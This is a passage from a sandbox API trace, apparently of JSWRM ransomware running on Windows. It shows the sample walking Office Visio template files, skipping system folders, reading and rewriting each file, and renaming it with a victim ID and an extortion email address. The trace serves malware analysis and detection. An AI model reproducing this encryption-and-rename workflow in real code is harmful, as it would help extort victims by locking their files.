lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEGENR_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0147.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0147.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEGENR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEGENR_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEGENR_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0147.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0147.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0147.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0147.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEGENR_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eegenr_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.946] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16998) returned 1 [0147.946] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4260) returned 0x27b348 [0147.946] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4260, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4260, lpOverlapped=0x0) returned 1 [0147.949] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.949] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4260, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4260, lpOverlapped=0x0) returned 1 [0147.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0147.949] CloseHandle (hObject=0x314) returned 1 [0147.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0147.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0147.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0147.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0147.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0147.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0147.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0147.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0147.950] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEGENR_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eegenr_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEGENR_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eegenr_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0147.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0147.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0147.951] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4ade205, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4ade205, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4ade205, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3deb, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEICS_M.VSTX", cAlternateFileName="EEICS_~2.VST")) returned 1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2=".") returned 1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2="..") returned 1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2="...") returned 1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2="windows") returned -1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2="recovery") returned -1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2="perflogs") returned -1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2="documents and settings") returned 1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2="system volume information") returned -1 [0147.951] lstrcmpiW (lpString1="EEICS_M.VSTX", lpString2="msocache") returned -1 [0147.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0147.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEICS_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEICS_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEICS_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0147.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0147.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0147.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEICS_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEICS_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEICS_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0147.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0147.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0147.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0147.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0147.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEICS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeics_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.953] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15851) returned 1 [0147.953] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3de0) returned 0x27b348 [0147.953] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3de0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3de0, lpOverlapped=0x0) returned 1 [0147.956] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.956] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3de0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3de0, lpOverlapped=0x0) returned 1 [0147.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0147.956] CloseHandle (hObject=0x314) returned 1 [0147.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0147.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0147.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0147.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0147.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0147.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0147.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0147.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0147.956] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEICS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeics_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEICS_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeics_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0147.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0147.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0147.958] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a6bc7c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a6bc7c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a6bc7c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3c77, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEICS_U.VSTX", cAlternateFileName="EEICS_~1.VST")) returned 1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2=".") returned 1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2="..") returned 1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2="...") returned 1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2="windows") returned -1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2="recovery") returned -1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2="perflogs") returned -1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2="documents and settings") returned 1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2="system volume information") returned -1 [0147.958] lstrcmpiW (lpString1="EEICS_U.VSTX", lpString2="msocache") returned -1 [0147.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0147.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEICS_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEICS_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEICS_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0147.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0147.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0147.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEICS_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEICS_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEICS_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0147.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0147.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0147.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0147.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0147.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEICS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeics_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.959] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15479) returned 1 [0147.959] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3c70) returned 0x27b348 [0147.959] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3c70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3c70, lpOverlapped=0x0) returned 1 [0147.962] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.962] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3c70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3c70, lpOverlapped=0x0) returned 1 [0147.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0147.962] CloseHandle (hObject=0x314) returned 1 [0147.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0147.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0147.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0147.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0147.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0147.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0147.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0147.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0147.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.963] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEICS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeics_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEICS_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeics_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0147.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0147.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0147.964] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3437c9a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3437c9a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3437c9a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x985b, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEMAIN_M.VSSX", cAlternateFileName="EEMAIN~1.VSS")) returned 1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2=".") returned 1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2="..") returned 1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2="...") returned 1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2="windows") returned -1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2="recovery") returned -1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2="perflogs") returned -1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2="documents and settings") returned 1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2="system volume information") returned -1 [0147.964] lstrcmpiW (lpString1="EEMAIN_M.VSSX", lpString2="msocache") returned -1 [0147.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0147.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAIN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAIN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMAIN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0147.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0147.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAIN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAIN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMAIN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0147.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0147.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0147.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 